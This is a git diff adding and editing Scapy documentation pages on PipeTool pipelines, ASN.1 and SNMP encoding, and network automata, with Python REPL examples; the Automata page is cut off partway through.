:class:`~scapy.pipetool.ConsoleSink` only. This explains why we only have the data of the lower sources inside the QueueSink: the higher one has not been linked. - -Most of the sinks receive from both lower and upper canals. This is verifiable using the `help(ConsoleSink)` - -.. code:: pycon - - >>> help(ConsoleSink) - Help on class ConsoleSink in module scapy.pipetool: - class ConsoleSink(Sink) - | Print messages on low and high entries - | +-------+ - | >>-|--. |->> - | | print | - | >-|--' |-> - | +-------+ - | - [...] - - -Sources -^^^^^^^ - -A Source is a class that generates some data. - -There are several source types integrated with Scapy, usable as-is, but you may -also create yours. - -Default Source classes -~~~~~~~~~~~~~~~~~~~~~~ - -For any of those class, have a look at ``help([theclass])`` to get more information or the required parameters. - -- :class:`~scapy.pipetool.CLIFeeder` : a source especially used in interactive software. its ``send(data)`` generates the event data on the lower canal -- :class:`~scapy.pipetool.CLIHighFeeder` : same than CLIFeeder, but writes on the higher canal -- :class:`~scapy.pipetool.PeriodicSource` : Generate messages periodically on the low canal. -- :class:`~scapy.pipetool.AutoSource`: the default source, that must be extended to create custom sources. - -Create a custom Source -~~~~~~~~~~~~~~~~~~~~~~ - -To create a custom source, one must extend the :class:`~scapy.pipetool.AutoSource` class. - -.. note:: - - Do NOT use the default :class:`~scapy.pipetool.Source` class except if you are really sure of what you are doing: it is only used internally, and is missing some implementation. The :class:`~scapy.pipetool.AutoSource` is made to be used. - - -To send data through it, the object must call its ``self._gen_data(msg)`` or ``self._gen_high_data(msg)`` functions, which send the data into the PipeEngine. - -The Source should also (if possible), set ``self.is_exhausted`` to ``True`` when empty, to allow the clean stop of the :class:`~scapy.pipetool.PipeEngine`. If the source is infinite, it will need a force-stop (see PipeEngine below) - -For instance, here is how :class:`~scapy.pipetool.CLIHighFeeder` is implemented: - -.. code:: python3 - - class CLIFeeder(CLIFeeder): - def send(self, msg): - self._gen_high_data(msg) - def close(self): - self.is_exhausted = True - -Drains -^^^^^^ - -Default Drain classes -~~~~~~~~~~~~~~~~~~~~~ - -Drains need to be linked on the entry that you are using. It can be either on the lower one (using ``>``) or the upper one (using ``>>``). -See the basic example above. - -- :class:`~scapy.pipetool.Drain` : the most basic Drain possible. Will pass on both low and high entry if linked properly. -- :class:`~scapy.pipetool.TransformDrain` : Apply a function to messages on low and high entry -- :class:`~scapy.pipetool.UpDrain` : Repeat messages from low entry to high exit -- :class:`~scapy.pipetool.DownDrain` : Repeat messages from high entry to low exit - -Create a custom Drain -~~~~~~~~~~~~~~~~~~~~~ - -To create a custom drain, one must extend the :class:`~scapy.pipetool.Drain` class. - -A :class:`~scapy.pipetool.Drain` object will receive data from the lower canal in its ``push`` method, and from the higher canal from its ``high_push`` method. - -To send the data back into the next linked Drain / Sink, it must call the ``self._send(msg)`` or ``self._high_send(msg)`` methods. - -For instance, here is how :class:`~scapy.pipetool.TransformDrain` is implemented:: - - class TransformDrain(Drain): - def __init__(self, f, name=None): - Drain.__init__(self, name=name) - self.f = f - def push(self, msg): - self._send(self.f(msg)) - def high_push(self, msg): - self._high_send(self.f(msg)) - -Sinks -^^^^^ - -Sinks are destinations for messages. - -A :py:class:`~scapy.pipetool.Sink` receives data like a :py:class:`~scapy.pipetool.Drain`, but doesn't send any -messages after it. - -Messages on the low entry come from :py:meth:`~scapy.pipetool.Sink.push`, and messages on the -high entry come from :py:meth:`~scapy.pipetool.Sink.high_push`. - -Default Sinks classes -~~~~~~~~~~~~~~~~~~~~~ - -- :class:`~scapy.pipetool.ConsoleSink` : Print messages on low and high entries to ``stdout`` -- :class:`~scapy.pipetool.RawConsoleSink` : Print messages on low and high entries, using os.write -- :class:`~scapy.pipetool.TermSink` : Prints messages on the low and high entries, on a separate terminal -- :class:`~scapy.pipetool.QueueSink` : Collects messages on the low and high entries into a :py:class:`Queue` - -Create a custom Sink -~~~~~~~~~~~~~~~~~~~~ - -To create a custom sink, one must extend :py:class:`~scapy.pipetool.Sink` and implement -:py:meth:`~scapy.pipetool.Sink.push` and/or :py:meth:`~scapy.pipetool.Sink.high_push`. - -This is a simplified version of :py:class:`~scapy.pipetool.ConsoleSink`: - -.. code-block:: python3 - - class ConsoleSink(Sink): - def push(self, msg): - print(">%r" % msg) - def high_push(self, msg): - print(">>%r" % msg) - -Link objects ------------- - -As shown in the example, most sources can be linked to any drain, on both low -and high entry. - -The use of ``>`` indicates a link on the low entry, and ``>>`` on the high -entry. - -For example, to link ``a``, ``b`` and ``c`` on the low entries: - -.. code-block:: pycon - - >>> a = CLIFeeder() - >>> b = Drain() - >>> c = ConsoleSink() - >>> a > b > c - >>> p = PipeEngine() - >>> p.add(a) - -This wouldn't link the high entries, so something like this would do nothing: - -.. code-block:: pycon - - >>> a2 = CLIHighFeeder() - >>> a2 >> b - >>> a2.send("hello") - -Because ``b`` (:py:class:`~scapy.pipetool.Drain`) and ``c`` (:py:class:`scapy.pipetool.ConsoleSink`) are not -linked on the high entry. - -However, using a :py:class:`~scapy.pipetool.DownDrain` would bring the high messages from -:py:class:`~scapy.pipetool.CLIHighFeeder` to the lower channel: - -.. code-block:: pycon - - >>> a2 = CLIHighFeeder() - >>> b2 = DownDrain() - >>> a2 >> b2 - >>> b2 > b - >>> a2.send("hello") - -The PipeEngine class --------------------- - -The :class:`~scapy.pipetool.PipeEngine` class is the core class of the Pipetool system. It must be initialized and passed the list of all Sources. - -There are two ways of passing sources: - -- during initialization: ``p = PipeEngine(source1, source2, ...)`` -- using the ``add(source)`` method - -A :class:`~scapy.pipetool.PipeEngine` class must be started with ``.start()`` function. It may be force-stopped with the ``.stop()``, or cleanly stopped with ``.wait_and_stop()`` - -A clean stop only works if the Sources is exhausted (has no data to send left). - -It can be printed into a graph using ``.graph()`` methods. see ``help(do_graph)`` for the list of available keyword arguments. - -Scapy advanced PipeTool objects -------------------------------- - -.. note:: Unlike the previous objects, those are not located in ``scapy.pipetool`` but in ``scapy.scapypipes`` - -Now that you know the default PipeTool objects, here are some more advanced ones, based on packet functionalities. - -- :class:`~scapy.scapypipes.SniffSource` : Read packets from an interface and send them to low exit. -- :class:`~scapy.scapypipes.RdpcapSource` : Read packets from a PCAP file send them to low exit. -- :class:`~scapy.scapypipes.InjectSink` : Packets received on low input are injected (sent) to an interface -- :class:`~scapy.scapypipes.WrpcapSink` : Packets received on low input are written to PCAP file -- :class:`~scapy.scapypipes.UDPDrain` : UDP payloads received on high entry are sent over UDP (complicated, have a look at ``help(UDPDrain)``) -- :class:`~scapy.scapypipes.FDSourceSink` : Use a file descriptor as source and sink -- :class:`~scapy.scapypipes.TCPConnectPipe`: TCP connect to addr:port and use it as source and sink -- :class:`~scapy.scapypipes.TCPListenPipe` : TCP listen on [addr:]port and use the first connection as source and sink (complicated, have a look at ``help(TCPListenPipe)``) - -Triggering ----------- - -Some special sort of Drains exists: the Trigger Drains. - -Trigger Drains are special drains, that on receiving data not only pass it by but also send a "Trigger" input, that is received and handled by the next triggered drain (if it exists). - -For example, here is a basic :class:`~scapy.scapypipes.TriggerDrain` usage: - -.. code:: pycon - - >>> a = CLIFeeder() - >>> d = TriggerDrain(lambda msg: True) # Pass messages and trigger when a condition is met - >>> d2 = TriggeredValve() - >>> s = ConsoleSink() - >>> a > d > d2 > s - >>> d ^ d2 # Link the triggers - >>> p = PipeEngine(s) - >>> p.start() - INFO: Pipe engine thread started. - >>> - >>> a.send("this will be printed") - >'this will be printed' - >>> a.send("this won't, because the valve was switched") - >>> a.send("this will, because the valve was switched again") - >'this will, because the valve was switched again' - >>> p.stop() - -Several triggering Drains exist, they are pretty explicit. It is highly recommended to check the doc using ``help([the class])`` - -- :class:`~scapy.scapypipes.TriggeredMessage` : Send a preloaded message when triggered and trigger in chain -- :class:`~scapy.scapypipes.TriggerDrain` : Pass messages and trigger when a condition is met -- :class:`~scapy.scapypipes.TriggeredValve` : Let messages alternatively pass or not, changing on trigger -- :class:`~scapy.scapypipes.TriggeredQueueingValve` : Let messages alternatively pass or queued, changing on trigger -- :class:`~scapy.scapypipes.TriggeredSwitch` : Let messages alternatively high or low, changing on trigger diff --git a/doc/scapy/advanced_usage/asn1_snmp.rst b/doc/scapy/advanced_usage/asn1_snmp.rst new file mode 100644 index 00000000000..feccf1f855d --- /dev/null +++ b/doc/scapy/advanced_usage/asn1_snmp.rst @@ -0,0 +1,485 @@ +ASN.1 and SNMP +============== + +What is ASN.1? +-------------- + +.. note:: + + This is only my view on ASN.1, explained as simply as possible. For more theoretical or academic views, I'm sure you'll find better on the Internet. + +ASN.1 is a notation whose goal is to specify formats for data exchange. It is independent of the way data is encoded. Data encoding is specified in Encoding Rules. + +The most used encoding rules are BER (Basic Encoding Rules) and DER (Distinguished Encoding Rules). Both look the same, but the latter is specified to guarantee uniqueness of encoding. This property is quite interesting when speaking about cryptography, hashes, and signatures. + +ASN.1 provides basic objects: integers, many kinds of strings, floats, booleans, containers, etc. They are grouped in the so-called Universal class. A given protocol can provide other objects which will be grouped in the Context class. For example, SNMP defines PDU_GET or PDU_SET objects. There are also the Application and Private classes. + +Each of these objects is given a tag that will be used by the encoding rules. Tags from 1 are used for Universal class. 1 is boolean, 2 is an integer, 3 is a bit string, 6 is an OID, 48 is for a sequence. Tags from the ``Context`` class begin at 0xa0. When encountering an object tagged by 0xa0, we'll need to know the context to be able to decode it. For example, in SNMP context, 0xa0 is a PDU_GET object, while in X509 context, it is a container for the certificate version. + +Other objects are created by assembling all those basic brick objects. The composition is done using sequences and arrays (sets) of previously defined or existing objects. The final object (an X509 certificate, a SNMP packet) is a tree whose non-leaf nodes are sequences and sets objects (or derived context objects), and whose leaf nodes are integers, strings, OID, etc. + +Scapy and ASN.1 +--------------- + +Scapy provides a way to easily encode or decode ASN.1 and also program those encoders/decoders. It is quite laxer than what an ASN.1 parser should be, and it kind of ignores constraints. It won't replace neither an ASN.1 parser nor an ASN.1 compiler. Actually, it has been written to be able to encode and decode broken ASN.1. It can handle corrupted encoded strings and can also create those. + +ASN.1 engine +^^^^^^^^^^^^ + +Note: many of the classes definitions presented here use metaclasses. If you don't look precisely at the source code and you only rely on my captures, you may think they sometimes exhibit a kind of magic behavior. +`` +Scapy ASN.1 engine provides classes to link objects and their tags. They inherit from the ``ASN1_Class``. The first one is ``ASN1_Class_UNIVERSAL``, which provide tags for most Universal objects. Each new context (``SNMP``, ``X509``) will inherit from it and add its own objects. + +:: + + class ASN1_Class_UNIVERSAL(ASN1_Class): + name = "UNIVERSAL" + # [...] + BOOLEAN = 1 + INTEGER = 2 + BIT_STRING = 3 + # [...] + + class ASN1_Class_SNMP(ASN1_Class_UNIVERSAL): + name="SNMP" + PDU_GET = 0xa0 + PDU_NEXT = 0xa1 + PDU_RESPONSE = 0xa2 + + class ASN1_Class_X509(ASN1_Class_UNIVERSAL): + name="X509" + CONT0 = 0xa0 + CONT1 = 0xa1 + # [...] + +All ASN.1 objects are represented by simple Python instances that act as nutshells for the raw values. The simple logic is handled by ``ASN1_Object`` whose they inherit from. Hence they are quite simple:: + + class ASN1_INTEGER(ASN1_Object): + tag = ASN1_Class_UNIVERSAL.INTEGER + + class ASN1_STRING(ASN1_Object): + tag = ASN1_Class_UNIVERSAL.STRING + + class ASN1_BIT_STRING(ASN1_STRING): + tag = ASN1_Class_UNIVERSAL.BIT_STRING + +These instances can be assembled to create an ASN.1 tree:: + + >>> x=ASN1_SEQUENCE([ASN1_INTEGER(7),ASN1_STRING("egg"),ASN1_SEQUENCE([ASN1_BOOLEAN(False)])]) + >>> x + , , ]]>]]> + >>> x.show() + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + + +Encoding engines +^^^^^^^^^^^^^^^^^ + +As with the standard, ASN.1 and encoding are independent. We have just seen how to create a compounded ASN.1 object. To encode or decode it, we need to choose an encoding rule. Scapy provides only BER for the moment (actually, it may be DER. DER looks like BER except only minimal encoding is authorised which may well be what I did). I call this an ASN.1 codec. + +Encoding and decoding are done using class methods provided by the codec. For example the ``BERcodec_INTEGER`` class provides a ``.enc()`` and a ``.dec()`` class methods that can convert between an encoded string and a value of their type. They all inherit from BERcodec_Object which is able to decode objects from any type:: + + >>> BERcodec_INTEGER.enc(7) + '\x02\x01\x07' + >>> BERcodec_BIT_STRING.enc("egg") + '\x03\x03egg' + >>> BERcodec_STRING.enc("egg") + '\x04\x03egg' + >>> BERcodec_STRING.dec('\x04\x03egg') + (, '') + >>> BERcodec_STRING.dec('\x03\x03egg') + Traceback (most recent call last): + File "", line 1, in ? + File "/usr/bin/scapy", line 2099, in dec + return cls.do_dec(s, context, safe) + File "/usr/bin/scapy", line 2178, in do_dec + l,s,t = cls.check_type_check_len(s) + File "/usr/bin/scapy", line 2076, in check_type_check_len + l,s3 = cls.check_type_get_len(s) + File "/usr/bin/scapy", line 2069, in check_type_get_len + s2 = cls.check_type(s) + File "/usr/bin/scapy", line 2065, in check_type + (cls.__name__, ord(s[0]), ord(s[0]),cls.tag), remaining=s) + BER_BadTag_Decoding_Error: BERcodec_STRING: Got tag [3/0x3] while expecting + ### Already decoded ### + None + ### Remaining ### + '\x03\x03egg' + >>> BERcodec_Object.dec('\x03\x03egg') + (, '') + +ASN.1 objects are encoded using their ``.enc()`` method. This method must be called with the codec we want to use. All codecs are referenced in the ASN1_Codecs object. ``raw()`` can also be used. In this case, the default codec (``conf.ASN1_default_codec``) will be used. + +:: + + >>> x.enc(ASN1_Codecs.BER) + '0\r\x02\x01\x07\x04\x03egg0\x03\x01\x01\x00' + >>> raw(x) + '0\r\x02\x01\x07\x04\x03egg0\x03\x01\x01\x00' + >>> xx,remain = BERcodec_Object.dec(_) + >>> xx.show() + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + + + >>> remain + '' + +By default, decoding is done using the ``Universal`` class, which means objects defined in the ``Context`` class will not be decoded. There is a good reason for that: the decoding depends on the context! + +:: + + >>> cert=""" + ... MIIF5jCCA86gAwIBAgIBATANBgkqhkiG9w0BAQUFADCBgzELMAkGA1UEBhMC + ... VVMxHTAbBgNVBAoTFEFPTCBUaW1lIFdhcm5lciBJbmMuMRwwGgYDVQQLExNB + ... bWVyaWNhIE9ubGluZSBJbmMuMTcwNQYDVQQDEy5BT0wgVGltZSBXYXJuZXIg + ... Um9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAyMB4XDTAyMDUyOTA2MDAw + ... MFoXDTM3MDkyODIzNDMwMFowgYMxCzAJBgNVBAYTAlVTMR0wGwYDVQQKExRB + ... T0wgVGltZSBXYXJuZXIgSW5jLjEcMBoGA1UECxMTQW1lcmljYSBPbmxpbmUg + ... SW5jLjE3MDUGA1UEAxMuQU9MIFRpbWUgV2FybmVyIFJvb3QgQ2VydGlmaWNh + ... dGlvbiBBdXRob3JpdHkgMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC + ... ggIBALQ3WggWmRToVbEbJGv8x4vmh6mJ7ouZzU9AhqS2TcnZsdw8TQ2FTBVs + ... RotSeJ/4I/1n9SQ6aF3Q92RhQVSji6UI0ilbm2BPJoPRYxJWSXakFsKlnUWs + ... i4SVqBax7J/qJBrvuVdcmiQhLE0OcR+mrF1FdAOYxFSMFkpBd4aVdQxHAWZg + ... /BXxD+r1FHjHDtdugRxev17nOirYlxcwfACtCJ0zr7iZYYCLqJV+FNwSbKTQ + ... 2O9ASQI2+W6p1h2WVgSysy0WVoaP2SBXgM1nEG2wTPDaRrbqJS5Gr42whTg0 + ... ixQmgiusrpkLjhTXUr2eacOGAgvqdnUxCc4zGSGFQ+aJLZ8lN2fxI2rSAG2X + ... +Z/nKcrdH9cG6rjJuQkhn8g/BsXS6RJGAE57COtCPStIbp1n3UsC5ETzkxml + ... J85per5n0/xQpCyrw2u544BMzwVhSyvcG7mm0tCq9Stz+86QNZ8MUhy/XCFh + ... EVsVS6kkUfykXPcXnbDS+gfpj1bkGoxoigTTfFrjnqKhynFbotSg5ymFXQNo + ... Kk/SBtc9+cMDLz9l+WceR0DTYw/j1Y75hauXTLPXJuuWCpTehTacyH+BCQJJ + ... Kg71ZDIMgtG6aoIbs0t0EfOMd9afv9w3pKdVBC/UMejTRrkDfNoSTllkt1Ex + ... MVCgyhwn2RAurda9EGYrw7AiShJbAgMBAAGjYzBhMA8GA1UdEwEB/wQFMAMB + ... Af8wHQYDVR0OBBYEFE9pbQN+nZ8HGEO8txBO1b+pxCAoMB8GA1UdIwQYMBaA + ... FE9pbQN+nZ8HGEO8txBO1b+pxCAoMA4GA1UdDwEB/wQEAwIBhjANBgkqhkiG + ... 9w0BAQUFAAOCAgEAO/Ouyuguh4X7ZVnnrREUpVe8WJ8kEle7+z802u6teio0 + ... cnAxa8cZmIDJgt43d15Ui47y6mdPyXSEkVYJ1eV6moG2gcKtNuTxVBFT8zRF + ... ASbI5Rq8NEQh3q0l/HYWdyGQgJhXnU7q7C+qPBR7V8F+GBRn7iTGvboVsNIY + ... vbdVgaxTwOjdaRITQrcCtQVBynlQboIOcXKTRuidDV29rs4prWPVVRaAMCf/ + ... drr3uNZK49m1+VLQTkCpx+XCMseqdiThawVQ68W/ClTluUI8JPu3B5wwn3la + ... 5uBAUhX0/Kr0VvlEl4ftDmVyXr4m+02kLQgH3thcoNyBM5kYJRF3p+v9WAks + ... mWsbivNSPxpNSGDxoPYzAlOL7SUJuA0t7Zdz7NeWH45gDtoQmy8YJPamTQr5 + ... O8t1wswvziRpyQoijlmn94IM19drNZxDAGrElWe6nEXLuA4399xOAU++CrYD + ... 062KRffaJ00psUjf5BHklka9bAI+1lHIlRcBFanyqqryvy9lG2/QuRqT9Y41 + ... xICHPpQvZuTpqP9BnHAqTyo5GJUefvthATxRCC4oGKQWDzH9OmwjkyB24f0H + ... hdFbP9IcczLd+rn4jM8Ch3qaluTtT4mNU0OrDhPAARW0eTjb/G49nlG2uBOL + ... Z8/5fNkiHfZdxRwBL5joeiQYvITX+txyW/fBOmg= + ... """.decode("base64") + >>> (dcert,remain) = BERcodec_Object.dec(cert) + Traceback (most recent call last): + File "", line 1, in ? + File "/usr/bin/scapy", line 2099, in dec + return cls.do_dec(s, context, safe) + File "/usr/bin/scapy", line 2094, in do_dec + return codec.dec(s,context,safe) + File "/usr/bin/scapy", line 2099, in dec + return cls.do_dec(s, context, safe) + File "/usr/bin/scapy", line 2218, in do_dec + o,s = BERcodec_Object.dec(s, context, safe) + File "/usr/bin/scapy", line 2099, in dec + return cls.do_dec(s, context, safe) + File "/usr/bin/scapy", line 2094, in do_dec + return codec.dec(s,context,safe) + File "/usr/bin/scapy", line 2099, in dec + return cls.do_dec(s, context, safe) + File "/usr/bin/scapy", line 2218, in do_dec + o,s = BERcodec_Object.dec(s, context, safe) + File "/usr/bin/scapy", line 2099, in dec + return cls.do_dec(s, context, safe) + File "/usr/bin/scapy", line 2092, in do_dec + raise BER_Decoding_Error("Unknown prefix [%02x] for [%r]" % (p,t), remaining=s) + BER_Decoding_Error: Unknown prefix [a0] for ['\xa0\x03\x02\x01\x02\x02\x01\x010\r\x06\t*\x86H...'] + ### Already decoded ### + [[]] + ### Remaining ### + '\xa0\x03\x02\x01\x02\x02\x01\x010\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\x831\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x1d0\x1b\x06\x03U\x04\n\x13\x14AOL Time Warner Inc.1\x1c0\x1a\x06\x03U\x04\x0b\x13\x13America Online Inc.1705\x06\x03U\x04\x03\x13.AOL Time Warner Root Certification Authority 20\x1e\x17\r020529060000Z\x17\r370928234300Z0\x81\x831\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x1d0\x1b\x06\x03U\x04\n\x13\x14AOL Time Warner Inc.1\x1c0\x1a\x06\x03U\x04\x0b\x13\x13America Online Inc.1705\x06\x03U\x04\x03\x13.AOL Time Warner Root Certification Authority 20\x82\x02"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x02\x0f\x000\x82\x02\n\x02\x82\x02\x01\x00\xb47Z\x08\x16\x99\x14\xe8U\xb1\x1b$k\xfc\xc7\x8b\xe6\x87\xa9\x89\xee\x8b\x99\xcdO@\x86\xa4\xb6M\xc9\xd9\xb1\xdc\xd6Q\xc8\x95\x17\x01\x15\xa9\xf2\xaa\xaa\xf2\xbf/e\x1bo\xd0\xb9\x1a\x93\xf5\x8e5\xc4\x80\x87>\x94/f\xe4\xe9\xa8\xffA\x9cp*O*9\x18\x95\x1e~\xfba\x01>> (dcert,remain) = BERcodec_Object.dec(cert, context=ASN1_Class_X509) + >>> dcert.show() + # ASN1_SEQUENCE: + # ASN1_SEQUENCE: + # ASN1_X509_CONT0: + + + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SET: + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + # ASN1_SEQUENCE: + + + + # ASN1_X509_CONT3: + # ASN1_SEQUENCE: + # ASN1_SEQUENCE: + + + + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + + + # ASN1_SEQUENCE: + + + + # ASN1_SEQUENCE: + + + \xd6Q\xc8\x95\x17\x01\x15\xa9\xf2\xaa\xaa\xf2\xbf/e\x1bo\xd0\xb9\x1a\x93\xf5\x8e5\xc4\x80\x87>\x94/f\xe4\xe9\xa8\xffA\x9cp*O*9\x18\x95\x1e~\xfba\x01 + +ASN.1 layers +^^^^^^^^^^^^ + +While this may be nice, it's only an ASN.1 encoder/decoder. Nothing related to Scapy yet. + +ASN.1 fields +~~~~~~~~~~~~ + +Scapy provides ASN.1 fields. They will wrap ASN.1 objects and provide the necessary logic to bind a field name to the value. ASN.1 packets will be described as a tree of ASN.1 fields. Then each field name will be made available as a normal ``Packet`` object, in a flat flavor (ex: to access the version field of a SNMP packet, you don't need to know how many containers wrap it). + +Each ASN.1 field is linked to an ASN.1 object through its tag. + + +ASN.1 packets +~~~~~~~~~~~~~ + +ASN.1 packets inherit from the Packet class. Instead of a ``fields_desc`` list of fields, they define ``ASN1_codec`` and ``ASN1_root`` attributes. The first one is a codec (for example: ``ASN1_Codecs.BER``), the second one is a tree compounded with ASN.1 fields. + +A complete example: SNMP +------------------------ + +SNMP defines new ASN.1 objects. We need to define them:: + + class ASN1_Class_SNMP(ASN1_Class_UNIVERSAL): + name="SNMP" + PDU_GET = 0xa0 + PDU_NEXT = 0xa1 + PDU_RESPONSE = 0xa2 + PDU_SET = 0xa3 + PDU_TRAPv1 = 0xa4 + PDU_BULK = 0xa5 + PDU_INFORM = 0xa6 + PDU_TRAPv2 = 0xa7 + +These objects are PDU, and are in fact new names for a sequence container (this is generally the case for context objects: they are old containers with new names). This means creating the corresponding ASN.1 objects and BER codecs is simplistic:: + + class ASN1_SNMP_PDU_GET(ASN1_SEQUENCE): + tag = ASN1_Class_SNMP.PDU_GET + + class ASN1_SNMP_PDU_NEXT(ASN1_SEQUENCE): + tag = ASN1_Class_SNMP.PDU_NEXT + + # [...] + + class BERcodec_SNMP_PDU_GET(BERcodec_SEQUENCE): + tag = ASN1_Class_SNMP.PDU_GET + + class BERcodec_SNMP_PDU_NEXT(BERcodec_SEQUENCE): + tag = ASN1_Class_SNMP.PDU_NEXT + + # [...] + +Metaclasses provide the magic behind the fact that everything is automatically registered and that ASN.1 objects and BER codecs can find each other. + +The ASN.1 fields are also trivial:: + + class ASN1F_SNMP_PDU_GET(ASN1F_SEQUENCE): + ASN1_tag = ASN1_Class_SNMP.PDU_GET + + class ASN1F_SNMP_PDU_NEXT(ASN1F_SEQUENCE): + ASN1_tag = ASN1_Class_SNMP.PDU_NEXT + + # [...] + +Now, the hard part, the ASN.1 packet:: + + SNMP_error = { 0: "no_error", + 1: "too_big", + # [...] + } + + SNMP_trap_types = { 0: "cold_start", + 1: "warm_start", + # [...] + } + + class SNMPvarbind(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( ASN1F_OID("oid","1.3"), + ASN1F_field("value",ASN1_NULL(0)) + ) + + + class SNMPget(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SNMP_PDU_GET( ASN1F_INTEGER("id",0), + ASN1F_enum_INTEGER("error",0, SNMP_error), + ASN1F_INTEGER("error_index",0), + ASN1F_SEQUENCE_OF("varbindlist", [], SNMPvarbind) + ) + + class SNMPnext(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SNMP_PDU_NEXT( ASN1F_INTEGER("id",0), + ASN1F_enum_INTEGER("error",0, SNMP_error), + ASN1F_INTEGER("error_index",0), + ASN1F_SEQUENCE_OF("varbindlist", [], SNMPvarbind) + ) + # [...] + + class SNMP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_enum_INTEGER("version", 1, {0:"v1", 1:"v2c", 2:"v2", 3:"v3"}), + ASN1F_STRING("community","public"), + ASN1F_CHOICE("PDU", SNMPget(), + SNMPget, SNMPnext, SNMPresponse, SNMPset, + SNMPtrapv1, SNMPbulk, SNMPinform, SNMPtrapv2) + ) + def answers(self, other): + return ( isinstance(self.PDU, SNMPresponse) and + ( isinstance(other.PDU, SNMPget) or + isinstance(other.PDU, SNMPnext) or + isinstance(other.PDU, SNMPset) ) and + self.PDU.id == other.PDU.id ) + # [...] + bind_layers( UDP, SNMP, sport=161) + bind_layers( UDP, SNMP, dport=161) + +That wasn't that much difficult. If you think that can't be that short to implement SNMP encoding/decoding and that I may have cut too much, just look at the complete source code. + +Now, how to use it? As usual:: + + >>> a=SNMP(version=3, PDU=SNMPget(varbindlist=[SNMPvarbind(oid="1.2.3",value=5), + ... SNMPvarbind(oid="3.2.1",value="hello")])) + >>> a.show() + ###[ SNMP ]### + version= v3 + community= 'public' + \PDU\ + |###[ SNMPget ]### + | id= 0 + | error= no_error + | error_index= 0 + | \varbindlist\ + | |###[ SNMPvarbind ]### + | | oid= '1.2.3' + | | value= 5 + | |###[ SNMPvarbind ]### + | | oid= '3.2.1' + | | value= 'hello' + >>> hexdump(a) + 0000 30 2E 02 01 03 04 06 70 75 62 6C 69 63 A0 21 02 0......public.!. + 0010 01 00 02 01 00 02 01 00 30 16 30 07 06 02 2A 03 ........0.0...*. + 0020 02 01 05 30 0B 06 02 7A 01 04 05 68 65 6C 6C 6F ...0...z...hello + >>> send(IP(dst="1.2.3.4")/UDP()/SNMP()) + . + Sent 1 packets. + >>> SNMP(raw(a)).show() + ###[ SNMP ]### + version= + community= + \PDU\ + |###[ SNMPget ]### + | id= + | error= + | error_index= + | \varbindlist\ + | |###[ SNMPvarbind ]### + | | oid= + | | value= + | |###[ SNMPvarbind ]### + | | oid= + | | value= + + + +Resolving OID from a MIB +------------------------ + +About OID objects +^^^^^^^^^^^^^^^^^ + +OID objects are created with an ``ASN1_OID`` class:: + + >>> o1=ASN1_OID("2.5.29.10") + >>> o2=ASN1_OID("1.2.840.113549.1.1.1") + >>> o1,o2 + (, ) + +Loading a MIB +^^^^^^^^^^^^^ + +Scapy can parse MIB files and become aware of a mapping between an OID and its name:: + + >>> load_mib("mib/*") + >>> o1,o2 + (, ) + +The MIB files I've used are attached to this page. + +Scapy's MIB database +^^^^^^^^^^^^^^^^^^^^ + +All MIB information is stored into the conf.mib object. This object can be used to find the OID of a name + +:: + + >>> conf.mib.sha1_with_rsa_signature + '1.2.840.113549.1.1.5' + +or to resolve an OID:: + + >>> conf.mib._oidname("1.2.3.6.1.4.1.5") + 'enterprises.5' + +It is even possible to graph it:: + + >>> conf.mib._make_graph() \ No newline at end of file diff --git a/doc/scapy/advanced_usage/automaton.rst b/doc/scapy/advanced_usage/automaton.rst new file mode 100644 index 00000000000..b8a7e984d70 --- /dev/null +++ b/doc/scapy/advanced_usage/automaton.rst @@ -0,0 +1,376 @@ +Automata +======== + +Scapy enables to create easily network automata. Scapy does not stick to a specific model like Moore or Mealy automata. It provides a flexible way for you to choose your way to go. + +An automaton in Scapy is deterministic. It has different states. A start state and some end and error states. There are transitions from one state to another. Transitions can be transitions on a specific condition, transitions on the reception of a specific packet or transitions on a timeout. When a transition is taken, one or more actions can be run. An action can be bound to many transitions. Parameters can be passed from states to transitions, and from transitions to states and actions. + +From a programmer's point of view, states, transitions and actions are methods from an Automaton subclass. They are decorated to provide meta-information needed in order for the automaton to work. + +First example +------------- + +Let's begin with a simple example. I take the convention to write states with capitals, but anything valid with Python syntax would work as well. + +:: + + class HelloWorld(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + print("State=BEGIN") + + @ATMT.condition(BEGIN) + def wait_for_nothing(self): + print("Wait for nothing...") + raise self.END() + + @ATMT.action(wait_for_nothing) + def on_nothing(self): + print("Action on 'nothing' condition") + + @ATMT.state(final=1) + def END(self): + print("State=END") + +In this example, we can see 3 decorators: + +* ``ATMT.state`` that is used to indicate that a method is a state, and that can + have initial, final, stop and error optional arguments set to non-zero for special states. +* ``ATMT.condition`` that indicate a method to be run when the automaton state + reaches the indicated state. The argument is the name of the method representing that state +* ``ATMT.action`` binds a method to a transition and is run when the transition is taken. + +Running this example gives the following result:: + + >>> a=HelloWorld() + >>> a.run() + State=BEGIN + Wait for nothing... + Action on 'nothing' condition + State=END + >>> a.destroy() + +This simple automaton can be described with the following graph: + +.. image:: ../graphics/ATMT_HelloWorld.* + +The graph can be automatically drawn from the code with:: + + >>> HelloWorld.graph() + +.. note:: An 